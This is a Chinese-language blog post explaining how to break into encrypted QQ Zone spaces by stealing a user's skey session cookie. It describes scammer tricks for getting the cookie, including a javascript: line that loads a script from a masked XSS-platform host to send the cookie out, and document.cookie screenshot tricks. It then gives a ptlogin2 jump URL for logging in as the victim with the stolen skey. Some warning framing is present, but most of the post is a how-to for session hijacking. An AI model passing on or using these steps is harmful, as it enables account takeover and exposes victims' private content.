解密通过QQ skey突破空间加密


最近有很多网友问我,泪寒空间下载器可以访问加密空间吗?对于此类问题,我只能再明确的说明下,泪寒空间下载器仅仅是一个下载软件,不具备所谓的破解功能。


那怎样才能破解QQ空间呢?下面顺便再介绍下传说中突破QQ空间的方法吧!



0x1
首先介绍一下COOKIE

Cookie的使用很普遍,基本存在登录功能的网站都是利用Cookie来辨认使用者,以方便调出使用者所对应的内容。
说白了,cookie就是网站在你本地保存的一串字符串,相当于给你一个临时身份证,方便网站识别你的身份,呈现出与你权限相对应的内容。

那么,此处就可以利用了,假如我能弄到某个Q号的cookies(即临时身份证),那我就能以这个Q号的主人身份登录QQ空间,也就是说,什么空间加密,相册加密都没用,我就是这个Q的主人,还加密个鸟!!



0x2
再深入一点,QQ空间是怎么通过cookie识别你的身份的呢?

简单的说,QQ空间仅仅是通过cookies中的skey这个参数的值来进行身份验证,有了skey,你就相当于可以绕过QQ的登陆权限,那问题就简单了,我们只需要得到这个值就可以了。如果你想看你的QQ空间的SKEY,就拖动下面的文字到书签保存,再进入到QQ空间,点击刚刚保存的书签,就会弹出你的cookies。



注:有了skey,你可以进入钱包账号,webQQ,QQ空间,等一切网页形式登陆QQ的地方,危害很大,所以,不要被人拿走你的skey。



0x3
常见骗取COOKIE方式:

1.让你检测空间,然后让你截图给他看。
空间助手的检测地址:
http://user.qzone.qq.com/troubleshooter

该地址是监测空间是否能正常登陆的连接。进去后腾讯会监测你本地信息,同时会有个日志输出,最先输出的就是cookie信息了。
所以,一般骗子会让你把滚动条拉到最上面给他截个图过去。截图过去,他就看到你的QQSKEY了哦。

注:该方法在pc端已经失效,但在移动端依然有效。

2.让你进入空间,然后让你执行js脚本给他看。

比如:

javascript:document.body.innerHTML=document.write("<script src=http://xss.***.com/***></script>");

上面这段代码,执行后,会把你QQ的cookie信息发送到对应的XSS平台,同一时间,骗子就得到你的cookie了。

或者会让你执行js代码,给他截图看。
如下:
javascript:alert(document.cookie);
或
javascript:document.body.innerHTML=document.cookie;

3.给你发一段链接,让你打开。

来源是腾讯平台的,检测当然是安全的,但当你打开后,很抱歉,你中招了,骗子已经同一时间得到了你的cookie,这类骗子的技术含量就很高了,因为他手头有腾讯平台的未被公开修复xss漏洞,原理同2.1,只是不需要你自己去插入执行,骗子已经插好,等着你打开执行而已。



好了,其他情况就不一一列举了,大家害人之心不可有,防人之心不可无。



0x4
得到skey后呢?很多人使用第三方的Qkey登录软件,其实这是非常不安全的,谁能保证网络上下载的这些免费软件不捆绑木马病毒呢?其实腾讯本身就提供了一个登录通道,得到skey后,只需要构造如下网站,打开就可以直接进入

http://ptlogin2.qq.com/jump?u1=http%3A%2F%2Fuser.qzone.qq.com&uin=QQ号码&skey=得到的SKEY


0X5

最后,别说什么没卵用,这是给菜鸟看的,不是给大神看的,大神请自行绕道。


正文到此结束

随便看看

发表评论

    avatar
    微笑 大笑 拽 大哭 奸笑 流汗 喷血 生气 囧 不爽 晕 示爱 卖萌 吃惊 迷离 爱你 吓死了 呵呵

      已有 1 条评论

    1. QQ Young. #1
      失效了吧~。。2016-01-04 12:32回复